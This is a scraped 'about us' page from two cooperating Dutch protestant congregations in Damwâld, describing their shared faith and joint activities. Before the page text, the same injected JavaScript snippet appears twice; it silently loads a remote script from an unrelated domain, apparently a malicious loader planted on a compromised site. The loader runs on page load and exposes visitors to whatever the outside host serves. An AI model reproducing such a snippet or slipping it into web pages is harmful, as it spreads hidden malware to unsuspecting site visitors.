;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wie wij zijn - PKN Damwâld
Wie wij zijn

Een levende kerk!

Wij zijn twee PKN-gemeenten, samen onderweg: Hervormde gemeente Akkerwoude, Murmerwoude, Broeksterwoude en De Valom & Gereformeerde kerk Damwoude.
Samen onderweg vinden we elkaar in een gedeeld geloof, gezamenlijke activiteiten en één toekomstbeeld. Op deze site vind je iets van de achtergrond, onze standpunten, wat ons drijft en wat we doen. Ben je benieuwd naar meer, kom dan gerust eens langs in één van de kerkdiensten of stuur een mail. Je bent welkom!

Samen onderweg

Zoals gezegd, zijn we twee middelgrote PKN-gemeenten. De onderlinge samenwerking is al een aantal jaren geleden ontstaan, niet uit noodzaak, maar  zo langzamerhand. Het eerst via gezamenlijke activiteiten voor de jeugd, met school-, kerk- en gezinsdiensten. Gaandeweg groeide het contact en daarmee het besef dat we samen meer kunnen delen, uitdragen en organiseren. Er is onderlinge herkenning, als dorpsgenoten én geloofsgenoten. Deze website is een uiting van het samen onderweg zijn.
Wilt u meer weten over de beide gemeenten, kijk dan rustig rond op de website.